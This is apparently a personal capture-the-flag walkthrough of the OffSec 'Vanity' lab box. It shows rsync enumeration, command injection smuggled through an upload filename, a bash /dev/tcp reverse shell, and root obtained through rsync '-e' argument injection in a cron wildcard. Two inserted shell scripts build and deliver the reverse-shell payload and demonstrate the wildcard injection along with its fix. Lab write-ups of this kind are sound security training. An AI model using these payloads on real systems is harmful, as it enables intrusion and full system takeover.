Vanity Walkthrough - Proving Grounds OffSec
Vanity was a fun little box themed around a virus scanner called "Vanity." It is rated Intermediate, and it required some thinking outside the box both to get in and for privilege escalation (priv esc). I already had everything booted up and ready to go. Once I had the IP, I ran an nmap scan of all ports to see what was open on the host.
nmap -p- 192.168.152.234 -oN nmap.txt
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
873/tcp open  rsync
Then I ran a second scan against the three open ports for version detection and default scripts:
nmap -sV -sC -p 22,80,873 192.168.152.234
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 62361a5cd3e37be170f8a3b31c4c2438 (RSA)
|   256 ee25fc236605c0c1ec47c6bb00c74f53 (ECDSA)
|_  256 835c51ac32e53a217cf6c2cd936858d8 (ED25519)
80/tcp  open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Vanity Virus Scanner
|_http-server-header: Apache/2.4.41 (Ubuntu)
873/tcp open  rsync   (protocol version 31)
Service Info: OS: Linux; CPE: cpe:/o:linux/
I started with the web server, since the page title was "Vanity Virus Scanner".
This part took me quite a while. I spent a long time trying to upload a PHP webshell: I changed the magic bytes at the start of the file and tried a range of extensions. The one extension that got through the filter was .php5. I thought for sure that once the upload succeeded I would have RCE (Remote Code Execution), but I was wrong: when I browsed to the uploaded file, the server simply served it as a download instead of executing it. After that I stepped back to look at other avenues. Port 873 was still open, so I Googled "rsync port 873" and found this page:
http://book.hacktricks.xyz/network-services-pentesting/873-pentesting-rsync/
It gave me some enumeration tips and showed how to interact with rsync. I ran another nmap script scan, this time with rsync-list-modules, to see whether any modules were exposed.
nmap -sV --script "rsync-list-modules" -p 873 192.168.152.234
There were, in fact, two modules. HackTricks also pointed out that if a module allows access without a password, you can list and even download the files in it. "backup" prompted for a password, so I tried "source":
rsync -av --list-only rsync://192.168.152.234/source
It listed a few files and folders.
After confirming I could list the module, I created a local directory called "vanity" and pulled the whole module down into it:
mkdir vanity
rsync -av rsync://192.168.152.234:873/source ./vanity
I wanted to read the upload.php source to see what had been blocking my webshell uploads. At the bottom of the file, it built a shell command from the upload and ran it through PHP's system() function. So instead of fighting the upload filter to get a webshell, I went for command injection through the upload itself. I started Burp to intercept the request so I could modify it, uploaded a random test.txt file I had lying around, and edited the filename: a ; terminates the original command and starts a new one, and I used id as the test command. With that small modification made, I forwarded the request.
As the response shows, the command injection worked: the output of id came back, so we had RCE at this point. Next I needed to turn that into a reverse shell, which took some trial and error. Reading these walkthroughs, you would think it was ten minutes from boot to root, but this part took me a few hours. I tried a plain command in quotes, without quotes, URL-encoded, and finally base64-encoded after reading some writeups of similar attacks. Port 4444 never connected back; port 443 did.
echo "bash -i >& /dev/tcp/192.168.45.156/443 0>&1" | base64
I started a netcat listener on port 443, copied the base64-encoded payload, and modified another intercepted POST request, putting the injection in the filename of the uploaded part:
nc -nvlp 443
# filename in the Content-Disposition header of the uploaded file part
filename="test.txt; echo (encoded payload) | base64 -d | bash"
Finally! I caught a reverse shell!
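The filename trick above, as an added shell example that is not part of the original post: it builds the injected filename for a given listener, decodes it the way the target's `echo ... | base64 -d | bash` would, and checks that the encoded blob is free of the characters (`>&`, `/`, quotes, spaces) that kept getting mangled by form and URL encoding, which is the reason base64 worked where raw commands failed. The form field name `file` and the upload URL passed to `send_payload` are assumptions about the target, not taken from the page.

```shell
#!/bin/sh
# Added example: construct and verify the base64-wrapped command injection
# carried in the multipart "filename" field. Nothing here contacts a target
# unless send_payload is called explicitly.

# Build "test.txt; echo <b64> | base64 -d | bash" for a bash reverse shell
# back to LHOST:LPORT. tr strips any line wrap base64 might add.
build_filename_payload() {
  lhost=$1
  lport=$2
  b64=$(printf 'bash -i >& /dev/tcp/%s/%s 0>&1' "$lhost" "$lport" | base64 | tr -d '\n')
  printf 'test.txt; echo %s | base64 -d | bash' "$b64"
}

# Pull the blob back out of a built filename (the part between "echo " and
# " | base64 -d | bash").
extract_b64() {
  printf '%s' "$1" | sed 's/^test.txt; echo \(.*\) | base64 -d | bash$/\1/'
}

# Recover the command the target would end up executing.
decode_filename_payload() {
  extract_b64 "$1" | base64 -d
}

# Succeeds only if the encoded blob is pure [A-Za-z0-9+/=], i.e. nothing in
# it needs URL- or quote-escaping inside the filename field.
payload_is_clean() {
  b64=$(extract_b64 "$1")
  [ -n "$b64" ] && [ -z "$(printf '%s' "$b64" | tr -d 'A-Za-z0-9+/=')" ]
}

# Deliver with curl. Field name "file" and the URL are assumptions; curl
# requires the double-quoted form when filename contains ';' or ','.
send_payload() {
  target=$1
  lhost=$2
  lport=$3
  payload=$(build_filename_payload "$lhost" "$lport")
  : >/tmp/test.txt
  curl -s -F "file=@\"/tmp/test.txt\";filename=\"$payload\"" "$target"
}

payload=$(build_filename_payload 192.168.45.156 443)
printf 'injected filename: %s\n' "$payload"
printf 'target executes:   %s\n' "$(decode_filename_payload "$payload")"
```

Start `nc -nvlp 443` first, then `send_payload http://192.168.152.234/upload.php 192.168.45.156 443` (URL assumed). The `base64 -d | bash` stage runs on the target, so the only characters that have to survive the HTTP request are the base64 alphabet plus spaces and pipes.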
I went ahead and snagged the local.txt flag.
Then I went straight to /tmp, pulled linpeas.sh over from my Kali machine and ran it to look for priv esc vectors.
#On Kali Machine
python3 -m http.server 80
#On Target Machine
wget http://192.168.45.156/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
After letting it run and reading through the results, I found a bash script that root was running from crontab.
Looking at what the script did, I saw that it changed directory to /var/www/html/uploads, the folder we could already write to, and then ran an rsync command. This part also took me quite a while! Since I was not too familiar with rsync, I read its help page to see whether any feature could be abused for priv esc.
rsync's -e (--rsh) option sets the program rsync uses as its remote shell, much like -e /bin/bash does when you run a netcat reverse shell. I must have passed over that option 20 times while reading the help page. Once I noticed it, it reminded me of an earlier CTF where I leveraged the same kind of option by naming a file "-e command" so that the program parsed the filename as an argument. So I wrote a bash reverse shell into a .sh file in the uploads directory:
echo "bash -i >& /dev/tcp/192.168.45.156/443 0>&1" > /var/www/html/uploads/shell.sh
touch '/var/www/html/uploads/-e bash shell.sh'
With shell.sh in place, I used touch to create a second file whose name is literally -e bash shell.sh. The trick depends on the cron job handing the directory contents to rsync through an unquoted wildcard: when rsync runs in that folder again, the shell expands the filenames into rsync's argument list, and rsync parses the leading -e as its remote-shell option with bash shell.sh as the program to run, instead of treating it as a file to copy. Because shell.sh is referenced by a relative path, it has to live in the uploads directory the script changes into.
I set up a netcat listener on port 443 and was able to get root!
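The argument-injection mechanics behind that root shell, as an added shell example that is not from the original post: it reproduces how an unquoted `*` turns a file named `-e bash shell.sh` into the first thing after rsync's options, and shows the `./*` form that keeps every expanded name from starting with `-`. It does not run rsync or the box's cron script, which the page does not show; the `rsync -a * /backup` shape is an assumption about what such a job looks like.

```shell
#!/bin/sh
# Added example: why a file literally named "-e bash shell.sh" is dangerous
# when a privileged job runs something like `rsync -a * /backup` from a
# directory that unprivileged users can write to. The shell expands `*`
# before rsync starts, so rsync receives "-e" and "bash shell.sh" as
# separate argv entries and treats them as its --rsh option.
set -u

# Scratch directory holding an innocent upload plus the weaponised name.
make_uploads_dir() {
  d=$(mktemp -d)
  touch "$d/report.txt"
  touch "$d/-e bash shell.sh"
  printf '%s' "$d"
}

# Mimic `rsync <opts> * <dest>` run from the directory: return the argv
# element the unquoted glob puts first. "-e bash shell.sh" sorts before
# "report.txt", so it lands right where rsync is still parsing options.
first_glob_arg() {
  ( cd "$1" && set -- * && printf '%s' "$1" )
}

# Safe variant: `./*` (or a `--` before the glob) guarantees no expanded
# name begins with '-', so rsync can only ever see it as a path.
first_safe_glob_arg() {
  ( cd "$1" && set -- ./* && printf '%s' "$1" )
}

main() {
  d=$(make_uploads_dir)
  printf 'unsafe glob, first argument: [%s]\n' "$(first_glob_arg "$d")"
  printf 'safe glob,   first argument: [%s]\n' "$(first_safe_glob_arg "$d")"
  rm -rf "$d"
}

main
```

When auditing a cron job like this, the check is simply whether the directory is writable by a less privileged user and whether the command expands a wildcard without `--` or a `./` prefix; either fix closes the hole regardless of which rsync option an attacker targets.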
This was a pretty challenging box, in my opinion. It made me read a ton of websites and articles to come up with ideas to try. I really enjoyed it though, as it also sparked memories of previous CTFs I’ve done with similar attack vectors. This is another reason why keeping notes is a must! Hope you enjoyed it, feel free to comment below if you have any questions or feedback.
-Sam